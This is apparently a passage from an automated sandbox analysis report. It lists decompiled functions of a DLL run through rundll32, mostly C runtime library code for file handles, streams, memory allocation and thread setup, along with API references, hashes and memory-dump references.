Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB53, Relevance: 13.6, APIs: 9, Instructions: 66
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000CB53(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E100076DE(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E1000C21F(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10014c80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E1000C21F(2);
							if(E1000C21F(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E1000C21F(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E1000C199(_t35);
					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10005EA5(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x1000cb56
0x1000cb5d
0x1000cb66
0x1000cb73
0x1000cbc5
0x1000cbc5
0x1000cb75
0x1000cb75
0x1000cb7d
0x1000cb8b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb93
0x1000cb93
0x1000cb95
0x1000cba7
0x00000000
0x1000cba9
0x1000cba9
0x1000cbb9
0x00000000
0x1000cbbb
0x1000cbc1
0x1000cbc1
0x1000cbb9
0x1000cba7
0x1000cb7d
0x1000cbc8
0x1000cbe0
0x1000cbe7
0x1000cbf5
0x1000cbe9
0x1000cbf0
0x1000cbf0
0x1000cbfa
0x1000cb5f
0x1000cb63
0x1000cb63

APIs

__ioinit.LIBCMT ref: 1000CB56

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

__get_osfhandle.LIBCMT ref: 1000CB6A
__get_osfhandle.LIBCMT ref: 1000CB95
__get_osfhandle.LIBCMT ref: 1000CB9E
__get_osfhandle.LIBCMT ref: 1000CBAA
CloseHandle.KERNEL32(00000000), ref: 1000CBB1
GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
__free_osfhnd.LIBCMT ref: 1000CBC8
__dosmaperr.LIBCMT ref: 1000CBEA

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150

Uniqueness

Uniqueness Score: -1.00%

Function 10002A10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
VariantClear.OLEAUT32(?), ref: 10002B69

Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A

PropVariantClear.OLE32(?), ref: 10002B59
VariantClear.OLEAUT32(?), ref: 10002B63

Strings

Key, xrefs: 10002ACA
EncodedValue, xrefs: 10002B09
Recipe/ExtendedProperties/Property, xrefs: 10002A35

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
API String ID: 3673094071-3396277477
Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100061BA, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E100061BA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E1000750E(_t3);
				if(E100092DA() != 0) {
					_t6 = E10007E6B(_t5, E10005F1A);
					 *0x10012310 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10007F1D(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10006230();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10007E95(_t9,  *0x10012310, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000610E(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10006230();
					return 0;
				}
			}

0x100061ba
0x100061c6
0x100061d5
0x100061db
0x100061e0
0x100061e3
0x00000000
0x100061e5
0x100061f2
0x100061f6
0x100061f8
0x10006227
0x10006227
0x1000622c
0x1000622f
0x100061fa
0x10006208
0x1000620a
0x00000000
0x1000620c
0x1000620c
0x1000620e
0x1000620f
0x10006216
0x1000621c
0x10006220
0x10006224
0x10006226
0x10006226
0x1000620a
0x100061f8
0x100061c8
0x100061c8
0x100061c8
0x100061cf
0x100061cf

APIs

__init_pointers.LIBCMT ref: 100061BA

Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532

__mtinitlocks.LIBCMT ref: 100061BF

Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8

__mtterm.LIBCMT ref: 100061C8

Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F

__calloc_crt.LIBCMT ref: 100061ED
__initptd.LIBCMT ref: 1000620F
GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 757573777-0
Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150

Uniqueness

Uniqueness Score: -1.00%

Function 1000C468, Relevance: 9.1, APIs: 6, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E100076DE(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E100095F8(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E1000951C();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E1000961C(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E1000951C();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E1000A133(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10012340;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E10005EC6())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E10005EC6())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}

0x1000c46d
0x1000c474
0x1000c47c
0x1000c481
0x1000c487
0x1000c48a
0x1000c48c
0x1000c48f
0x1000c49e
0x1000c4a1
0x1000c4bd
0x1000c4bf
0x1000c4c2
0x1000c4d7
0x1000c4dd
0x1000c4e0
0x1000c4e3
0x1000c4e6
0x1000c4eb
0x1000c4ed
0x1000c4f5
0x1000c4f7
0x1000c505
0x1000c506
0x1000c50c
0x1000c50e
0x00000000
0x00000000
0x1000c4f9
0x1000c4f9
0x1000c501
0x1000c503
0x1000c510
0x1000c511
0x00000000
0x00000000
0x00000000
0x1000c503
0x1000c4f7
0x1000c517
0x1000c51e
0x1000c5a0
0x1000c5a4
0x1000c5a9
0x1000c5aa
0x1000c5ab
0x1000c5b2
0x1000c5b7
0x1000c5bd
0x00000000
0x1000c520
0x1000c520
0x1000c528
0x1000c52d
0x1000c532
0x1000c535
0x1000c538
0x1000c53a
0x1000c553
0x1000c556
0x1000c573
0x1000c573
0x1000c558
0x1000c558
0x1000c55b
0x00000000
0x1000c55d
0x1000c56a
0x1000c56a
0x1000c55b
0x1000c578
0x1000c57c
0x00000000
0x1000c57e
0x1000c57e
0x1000c580
0x1000c581
0x1000c582
0x1000c583
0x1000c58d
0x1000c590
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c590
0x1000c53c
0x1000c53c
0x1000c53d
0x1000c53e
0x1000c547
0x1000c592
0x1000c595
0x1000c598
0x1000c5bf
0x1000c5bf
0x1000c5c2
0x1000c5cf
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x00000000
0x1000c5c4
0x1000c5c2
0x1000c53a
0x1000c4c4
0x1000c4c4
0x1000c4c7
0x1000c4ca
0x1000c54e
0x1000c5c8
0x1000c5c8
0x1000c4cc
0x1000c4cf
0x1000c4cf
0x1000c4d2
0x1000c4d4
0x00000000
0x1000c4d4
0x1000c4ca
0x1000c4a3
0x1000c4a8
0x00000000
0x1000c4a8
0x1000c491
0x1000c496
0x1000c4ae
0x1000c4ae
0x1000c4b2
0x1000c4b2
0x1000c5d6
0x1000c476
0x1000c47a
0x1000c47a

APIs

__ioinit.LIBCMT ref: 1000C46D

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10

Uniqueness

Uniqueness Score: -1.00%

Function 10005033, Relevance: 9.1, APIs: 6, Instructions: 134
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E100076DE(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E100095F8(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E1000951C();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E1000961C(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E1000951C();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E1000A133(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10012340;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E10005EC6();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E10005EC6();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

0x10005037
0x1000503e
0x10005046
0x1000504b
0x10005051
0x10005051
0x10005054
0x10005056
0x10005059
0x10005068
0x1000506b
0x10005085
0x10005087
0x1000508a
0x1000509f
0x1000509f
0x100050a5
0x100050a8
0x100050ab
0x100050ae
0x100050b3
0x100050b5
0x100050bd
0x100050bf
0x100050cd
0x100050ce
0x100050d4
0x100050d6
0x00000000
0x00000000
0x100050c1
0x100050c1
0x100050c9
0x100050cb
0x100050d8
0x100050d9
0x00000000
0x00000000
0x00000000
0x100050cb
0x100050bf
0x100050df
0x100050e6
0x10005164
0x10005165
0x10005166
0x1000516c
0x1000516d
0x1000516e
0x10005176
0x00000000
0x100050e8
0x100050e8
0x100050e8
0x100050ed
0x100050f0
0x100050f2
0x100050f5
0x100050f8
0x100050fb
0x100050fe
0x10005100
0x10005119
0x1000511c
0x10005139
0x10005139
0x1000511e
0x1000511e
0x10005121
0x00000000
0x10005123
0x10005130
0x10005130
0x10005121
0x1000513e
0x10005142
0x00000000
0x10005144
0x10005144
0x10005146
0x10005147
0x10005148
0x1000514e
0x10005153
0x10005156
0x00000000
0x00000000
0x00000000
0x00000000
0x10005156
0x10005102
0x10005102
0x10005103
0x10005104
0x1000510d
0x10005158
0x10005158
0x1000515b
0x1000515e
0x10005178
0x10005178
0x1000517b
0x10005186
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x00000000
0x1000517d
0x1000517b
0x10005100
0x1000508c
0x1000508c
0x1000508f
0x10005092
0x10005114
0x10005181
0x10005181
0x10005094
0x10005094
0x10005097
0x10005097
0x1000509a
0x1000509c
0x00000000
0x1000509c
0x10005092
0x1000506d
0x1000506d
0x10005072
0x00000000
0x10005072
0x1000505b
0x1000505b
0x10005060
0x10005078
0x10005078
0x1000507c
0x1000507c
0x1000518e
0x10005040
0x10005044
0x10005044

APIs

__ioinit.LIBCMT ref: 10005037

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004A66, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008E67(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E10009026(_t10, _a4) == 0) {
						_push(1);
						_t22 =  &_v28;
						_v16 = "bad allocation";
						E10008F1E(_t22,  &_v16);
						_v28 = 0x1000e460;
						E10009059( &_v28, 0x10010b04);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x1000e460;
						E10008F5C(_t22);
						if((_v32 & 0x00000001) != 0) {
							L10003800(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x10004a66
0x10004a66
0x10004a66
0x10004a7b
0x10004a7e
0x10004a86
0x00000000
0x00000000
0x10004a79
0x10004a8a
0x10004a90
0x10004a93
0x10004a9a
0x10004aa8
0x10004aaf
0x10004ab4
0x10004ab9
0x10004abb
0x10004ac1
0x10004aca
0x10004acd
0x10004ad2
0x10004ad7
0x00000000
0x00000000
0x00000000
0x00000000
0x10004a79
0x10004a89
0x00000000

APIs

_malloc.LIBCMT ref: 10004A7E

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00270000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

std::exception::exception.LIBCMT ref: 10004A9A
__CxxThrowException@8.LIBCMT ref: 10004AAF

Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA

Strings

h, xrefs: 10004A93
`, xrefs: 10004AA8

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: `$h
API String ID: 1059622496-773005782
Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 1000B39B, Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10013c2c == _t7) {
									_t9 = E10005EC6();
									 *_t9 = E10005ED9(GetLastError());
									goto L17;
								} else {
									if(E10009026(_t7, _t31) == 0) {
										_t12 = E10005EC6();
										 *_t12 = E10005ED9(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009026(_t6, _t31);
						 *((intOrPtr*)(E10005EC6())) = 0xc;
						goto L12;
					} else {
						E10004732(_a4);
